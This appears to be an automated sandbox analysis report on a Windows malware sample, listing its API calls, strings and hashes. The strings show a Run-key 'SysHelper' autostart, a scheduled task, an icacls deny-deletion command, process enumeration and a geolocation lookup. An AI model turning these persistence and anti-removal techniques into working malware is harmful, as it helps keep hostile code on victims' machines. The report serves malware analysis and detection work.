39410->39411 39412 bb8af7 __lock 58 API calls 39411->39412 39413 bbfe71 _W_expandtime 39412->39413 39414 bbf857 __tzset_nolock 58 API calls 39413->39414 39415 bbfe86 39414->39415 39429 bbff25 __tzset_nolock __isindst_nolock 39415->39429 39440 bbf803 58 API calls __fclose_nolock 39415->39440 39418 bbfe98 39418->39429 39441 bbf82d 58 API calls __fclose_nolock 39418->39441 39419 bbff71 GetTimeZoneInformation 39419->39429 39422 bbfeaa 39422->39429 39442 bc3f99 58 API calls 2 library calls 39422->39442 39424 bbffd8 WideCharToMultiByte 39424->39429 39425 bbfeb8 39443 bd1667 78 API calls 3 library calls 39425->39443 39427 bc0010 WideCharToMultiByte 39427->39429 39428 bbfed9 type_info::operator== 39428->39429 39431 bbff0c _strlen 39428->39431 39444 bb0bed 58 API calls 2 library calls 39428->39444 39429->39419 39429->39424 39429->39427 39436 bcff8e 58 API calls __tzset_nolock 39429->39436 39437 bc0157 __tzset_nolock _fgetws __isindst_nolock 39429->39437 39438 bb3c2d 61 API calls UnDecorator::getZName 39429->39438 39446 bb42fd 8 API calls 2 library calls 39429->39446 39447 bb0bed 58 API calls 2 library calls 39429->39447 39448 bc00d7 LeaveCriticalSection _doexit 39429->39448 39432 bb8cde __malloc_crt 58 API calls 39431->39432 39434 bbff1a _strlen 39432->39434 39434->39429 39445 bbc0fd 58 API calls __fclose_nolock 39434->39445 39436->39429 39437->39391 39438->39429 39439->39386 39440->39418 39441->39422 39442->39425 39443->39428 39444->39431 39445->39429 39446->39429 39447->39429 39448->39429 39449->39401 39450->39403 39478 bb019c 39451->39478 39453 bb27d4 39486 bb5208 58 API calls __getptd_noexit 39453->39486 39456 bb27d9 39487 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 39456->39487 39457 bb27e9 MultiByteToWideChar 39460 bb2815 39457->39460 39461 bb2804 GetLastError 39457->39461 39459 b9d7a3 39459->39125 39462 bb8cde __malloc_crt 58 API calls 39460->39462 39488 bb51e7 58 API calls 3 library calls 39461->39488 39465 bb281d 39462->39465 39464 bb2810 39491 bb0bed 58 
API calls 2 library calls 39464->39491 39465->39464 39466 bb2825 MultiByteToWideChar 39465->39466 39466->39461 39468 bb283f 39466->39468 39470 bb8cde __malloc_crt 58 API calls 39468->39470 39469 bb28a0 39492 bb0bed 58 API calls 2 library calls 39469->39492 39472 bb284a 39470->39472 39472->39464 39489 bbd51e 88 API calls 3 library calls 39472->39489 39474 bb2866 39474->39464 39475 bb286f WideCharToMultiByte 39474->39475 39475->39464 39476 bb288b GetLastError 39475->39476 39490 bb51e7 58 API calls 3 library calls 39476->39490 39479 bb01ad 39478->39479 39480 bb01fa 39478->39480 39493 bb5007 58 API calls 2 library calls 39479->39493 39480->39453 39480->39457 39482 bb01b3 39483 bb01da 39482->39483 39494 bb45dc 58 API calls 6 library calls 39482->39494 39483->39480 39495 bb495e 58 API calls 6 library calls 39483->39495 39486->39456 39487->39459 39488->39464 39489->39474 39490->39464 39491->39469 39492->39459 39493->39482 39494->39483 39495->39480 39496->39165 39503 bb7e1a _fgetws 39502->39503 39504 bb8af7 __lock 51 API calls 39503->39504 39505 bb7e21 39504->39505 39506 bb7eda __cinit 39505->39506 39507 bb7e4f DecodePointer 39505->39507 39522 bb7f28 39506->39522 39507->39506 39509 bb7e66 DecodePointer 39507->39509 39516 bb7e76 39509->39516 39511 bb7f37 _fgetws 39511->38879 39513 bb7e83 EncodePointer 39513->39516 39514 bb7f1f 39515 bb7b0b __mtinitlocknum 3 API calls 39514->39515 39517 bb7f28 39515->39517 39516->39506 39516->39513 39518 bb7e93 DecodePointer EncodePointer 39516->39518 39519 bb7f35 39517->39519 39527 bb8c81 LeaveCriticalSection 39517->39527 39520 bb7ea5 DecodePointer DecodePointer 39518->39520 39519->38879 39520->39516 39523 bb7f2e 39522->39523 39525 bb7f08 39522->39525 39528 bb8c81 LeaveCriticalSection 39523->39528 39525->39511 39526 bb8c81 LeaveCriticalSection 39525->39526 39526->39514 39527->39519 39528->39525
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00B9CF10: _memset.LIBCMT ref: 00B9CF4A
                                                                                                                                                                          • Part of subcall function 00B9CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00B9CF5F
                                                                                                                                                                          • Part of subcall function 00B9CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00B9CFA6
                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00BA9FC4
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BA9FD2
                                                                                                                                                                        • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00BA9FDA
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BA9FE4
                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,00DD31C0,?), ref: 00BAA0BB
                                                                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BAA0C2
                                                                                                                                                                        • GetCommandLineW.KERNEL32(?,?), ref: 00BAA161
                                                                                                                                                                          • Part of subcall function 00BA24E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00BA24FE
                                                                                                                                                                          • Part of subcall function 00BA24E0: GetLastError.KERNEL32 ref: 00BA2509
                                                                                                                                                                          • Part of subcall function 00BA24E0: CloseHandle.KERNEL32 ref: 00BA251C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                                                                                        • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$list<T> too long${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                                                                        • API String ID: 2957410896-1224459563
                                                                                                                                                                        • Opcode ID: e65c9f2ee7c8f04e2b4ee5fc8fec1db99d89278082bf086e094059920450f1ce
                                                                                                                                                                        • Instruction ID: 73941414d16913fe58f7feb174d1db90b03984ebbd884bec1ab251982b1e4f32
                                                                                                                                                                        • Opcode Fuzzy Hash: e65c9f2ee7c8f04e2b4ee5fc8fec1db99d89278082bf086e094059920450f1ce
                                                                                                                                                                        • Instruction Fuzzy Hash: 35D2C670508341AFDB14EF24C895B9FB7E4FF96704F0009ADF48597292EB719A49CBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00B9D26C
                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00B9D28F
                                                                                                                                                                        • CoCreateInstance.OLE32(00C6506C,00000000,00000001,00C64FEC,?,?,00000000,000000FF), ref: 00B9D2D5
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00B9D2F0
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00B9D309
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00B9D322
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00B9D33B
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00B9D397
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00B9D3A4
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00B9D3B1
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00B9D3C2
                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00B9D3D5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                                                                                        • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                                                                                        • API String ID: 2496729271-1738591096
                                                                                                                                                                        • Opcode ID: fba401028ec2711b2a1cf59977149ed72a4dc6ecdc8b210550a040966268c086
                                                                                                                                                                        • Instruction ID: 6dd41c0cf9d3b8cf1ffb7fbfc81cbe624eee9482d058eb1825666ed336dae431
                                                                                                                                                                        • Opcode Fuzzy Hash: fba401028ec2711b2a1cf59977149ed72a4dc6ecdc8b210550a040966268c086
                                                                                                                                                                        • Instruction Fuzzy Hash: 71525D70E00219DFDF10DBA5C898FAEBBF5AF49704F1481A8E505BB251DB70AE45CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00BA2235
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,?), ref: 00BA2240
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(00000000), ref: 00BA2248
                                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00BA2256
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00BA226A
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00BA2275
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00BA2280
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00BA2291
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00BA229F
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00BA22AA
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00BA22B5
                                                                                                                                                                        • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 00BA22CD
                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00BA22FE
                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00BA2315
                                                                                                                                                                        • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 00BA232C
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BA2347
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                                                                                        • API String ID: 3668891214-3807497772
                                                                                                                                                                        • Opcode ID: 3a4825e02512e3c4d176ce502ad0f8d1decf4d8f7e37a038d37fe3828cbecd38
                                                                                                                                                                        • Instruction ID: a1d45fc6c4c0febdd17711efe1fb3018bd7ef492a5e00e474a1ef5a1615f57ee
                                                                                                                                                                        • Opcode Fuzzy Hash: 3a4825e02512e3c4d176ce502ad0f8d1decf4d8f7e37a038d37fe3828cbecd38
                                                                                                                                                                        • Instruction Fuzzy Hash: 13313F71E00319AFDF10AFA99C89FEEB7F8FF45705F1040AAE904E2150DA749A418BA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00B9CF4A
                                                                                                                                                                        • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00B9CF5F
                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00B9CFA6
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00002800,?), ref: 00B9CFCD
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00B9CFDA
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00B9CFDD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                                                                                        • String ID: $"country_code":"$$$($Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                                                                                        • API String ID: 1485416377-933853286
                                                                                                                                                                        • Opcode ID: a530dedef9b63392966bc8c23b79a841feaf16b2573da58d558adf5a04c64d91
                                                                                                                                                                        • Instruction ID: 8c3f939554028bdcb460ee0cc2b19c665ca51b2f442570f95020cadd565d385e
                                                                                                                                                                        • Opcode Fuzzy Hash: a530dedef9b63392966bc8c23b79a841feaf16b2573da58d558adf5a04c64d91
                                                                                                                                                                        • Instruction Fuzzy Hash: E2919E71D002589FEF20CFA4CD49BEEBBF4AF15704F2041A8E4057B291D7B65A88CB61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00C5AC68,000000FF), ref: 00BA1D12
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA1D3B
                                                                                                                                                                        • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00BA1D63
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C5AC68,000000FF), ref: 00BA1D6C
                                                                                                                                                                        • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00BA1DD6
                                                                                                                                                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00BA1E48
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00BA1E99
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00BA1EA5
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00BA1EB4
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00BA1EBF
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BA1ECE
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 00BA1EDB
                                                                                                                                                                        • UuidCreate.RPCRT4(?), ref: 00BA1EFC
                                                                                                                                                                        • UuidToStringW.RPCRT4(?,?), ref: 00BA1F14
                                                                                                                                                                        • RpcStringFreeW.RPCRT4(00000000), ref: 00BA1F64
                                                                                                                                                                        • PathAppendW.SHLWAPI(?,?), ref: 00BA1F83
                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00BA1F8E
                                                                                                                                                                        • PathAppendW.SHLWAPI(?,?,?,?), ref: 00BA202D
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00BA2036
                                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00BA204C
                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00BA206E
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA2090
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00C902FC), ref: 00BA20AA
                                                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00BA20C0
                                                                                                                                                                        • lstrcatW.KERNEL32(?," --AutoStart), ref: 00BA20CE
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00BA20D7
                                                                                                                                                                        • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 00BA20F3
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00BA20FC
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA2120
                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00BA2146
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,icacls "), ref: 00BA2158
                                                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00BA216D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                                                                                        • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                                                                                        • API String ID: 2589766509-1182136429
                                                                                                                                                                        • Opcode ID: 78a923f88a7ac772b79cfc52db1606d5d343b559f7a2b3e86d56c0ae9d11001b
                                                                                                                                                                        • Instruction ID: a462904f1f806b46da07b537519e7d62a0c5dc1e09f74b1344c065141fd00c9e
                                                                                                                                                                        • Opcode Fuzzy Hash: 78a923f88a7ac772b79cfc52db1606d5d343b559f7a2b3e86d56c0ae9d11001b
                                                                                                                                                                        • Instruction Fuzzy Hash: 62E15B75D0431AAFDF24DBA4CD89BEEB7B8FF04305F1044AAE505B6190EB74AA85CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00BB35B1
                                                                                                                                                                          • Part of subcall function 00BB5208: __getptd_noexit.LIBCMT ref: 00BB5208
                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00BB364A
                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00BB3680
                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00BB369D
                                                                                                                                                                        • __allrem.LIBCMT ref: 00BB36F3
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BB370F
                                                                                                                                                                        • __allrem.LIBCMT ref: 00BB3726
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BB3744
                                                                                                                                                                        • __allrem.LIBCMT ref: 00BB375B
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BB3779
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1503770280-0
                                                                                                                                                                        • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                                        • Instruction ID: 28060a13275d1e9354f3e82df437614ccc85bc7fd4cfd4f32046b7a6c076b34e
                                                                                                                                                                        • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                                        • Instruction Fuzzy Hash: BD7196B1A00716ABD7249E79CC81FFAB3E8EF54724F1442BAF514D6681EBB0DE408790
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 00B9EF69
                                                                                                                                                                          • Part of subcall function 00BB0C62: __FF_MSGBANNER.LIBCMT ref: 00BB0C79
                                                                                                                                                                          • Part of subcall function 00BB0C62: __NMSG_WRITE.LIBCMT ref: 00BB0C80
                                                                                                                                                                          • Part of subcall function 00BB0C62: RtlAllocateHeap.NTDLL(00DB0000,00000000,00000001,?,?,?,?,00BB3B69,?), ref: 00BB0CA5
                                                                                                                                                                        • _malloc.LIBCMT ref: 00B9EF85
                                                                                                                                                                        • _memset.LIBCMT ref: 00B9EF9B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _malloc$AllocateHeap_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3655941445-0
                                                                                                                                                                        • Opcode ID: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
                                                                                                                                                                        • Instruction ID: e2b0ee1392a8786655ed1856109ffa7dbb2a55eae6c31c645857bd3a013b4851
                                                                                                                                                                        • Opcode Fuzzy Hash: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
                                                                                                                                                                        • Instruction Fuzzy Hash: 6B11A331500614EFDB10DF98C881BAA7BB5FF89310F2441E9E9499B356D771E912CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BB3B64
                                                                                                                                                                          • Part of subcall function 00BB0C62: __FF_MSGBANNER.LIBCMT ref: 00BB0C79
                                                                                                                                                                          • Part of subcall function 00BB0C62: __NMSG_WRITE.LIBCMT ref: 00BB0C80
                                                                                                                                                                          • Part of subcall function 00BB0C62: RtlAllocateHeap.NTDLL(00DB0000,00000000,00000001,?,?,?,?,00BB3B69,?), ref: 00BB0CA5
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 00BB3B82
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BB3B97
                                                                                                                                                                          • Part of subcall function 00BC0ECA: RaiseException.KERNEL32(?,?,?,00C9793C,?,?,?,?,?,00BB3B9C,?,00C9793C,?,00000001), ref: 00BC0F1F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph (figure not reproduced; legend: Executed / Not Executed)
                                                                                                                                                                        APIs
                                                                                                                                                                        • __lock.LIBCMT ref: 00BBFB7B
                                                                                                                                                                          • Part of subcall function 00BB8AF7: __mtinitlocknum.LIBCMT ref: 00BB8B09
                                                                                                                                                                          • Part of subcall function 00BB8AF7: __amsg_exit.LIBCMT ref: 00BB8B15
                                                                                                                                                                          • Part of subcall function 00BB8AF7: EnterCriticalSection.KERNEL32(00BB3B69,?,00BB50D7,0000000D), ref: 00BB8B22
                                                                                                                                                                        • __tzset_nolock.LIBCMT ref: 00BBFB8E
